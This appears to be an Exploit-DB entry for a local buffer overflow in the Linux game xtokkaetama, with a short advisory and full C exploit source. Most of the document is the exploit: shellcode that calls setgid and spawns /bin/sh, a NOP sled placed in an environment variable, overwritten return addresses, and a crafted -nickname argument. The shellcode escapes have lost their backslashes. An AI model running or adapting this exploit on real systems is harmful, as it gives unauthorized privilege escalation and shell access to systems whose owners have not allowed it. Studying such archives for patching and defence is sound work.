https://www.exploit-db.com/exploits/22984

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/8337/info

xtokkaetama is prone to a locally exploitable buffer overflow vulnerability. This is due to insufficient bounds checking of the '-nickname' command line option, which could result in execution of arbitrary code in the context of the software. 

The software is typically installed setgid 'games'.

/* (linux/x86)xtokkaetama[v1.0b+]: (games) local buffer overflow exploit.
   by: v9[[email protected]]. (fakehalo)

   exploits an overflow missed in the patch/upgrade of:
    http://www.securityfocus.com/bid/8312

   fix:
    xtama_score.c:132: +strncpy(name,nickname,sizeof(name)-1);
    xtama_score.c:132: -sscanf( nickname , "%s",name ) ;

   (tested on non-debian, should still work elsewhere)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <grp.h>
#include <sys/types.h>
#define PATH "/usr/games/xtokkaetama" /* game binary. */
static char exec[]= /* setgid(?)+shell.               */
 "x31xdbx31xc9xb3x00xb1x00x31xc0xb0x47xcd"
 "x80xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56"
 "x07x89x56x0fxb8x1bx56x34x12x35x10x56x34"
 "x12x8dx4ex0bx8bxd1xcdx80x33xc0x40xcdx80"
 "xe8xd7xffxffxffx2fx62x69x6ex2fx73x68x01";
int main(){
 unsigned int i;
 char *buf;
 struct group *gent;
 printf("(*)xtokkaetama[v1.0b+]: local buffer overflow exploit.n");
 printf("(*)by: [email protected] / fakehalo.nn");
 if(!(buf=(char *)malloc(16384+1)))exit(1);
 memset(buf,0x90,(16384-strlen(exec)));
 if(!(gent=getgrnam("games")))exec[5]=exec[7]=20;
 else{exec[5]=exec[7]=gent->gr_gid;}
 strcat(buf,exec);
 setenv("EXEC",buf,1);
 memset(buf,0x0,(16384+1));
 for(i=0;i<512;i+=4){*(long *)&buf[i]=0xbfffe001;} 
 printf("[*] in the game, hit: spacebar, "Q", spacebar, spacebar.n");
 sleep(3);
 printf("[*] entering xtokkaetama...n");
 if(execlp(PATH,PATH,"-nickname",buf,0))
  printf("[!] failed to execute %s.n",PATH);
 exit(0);
}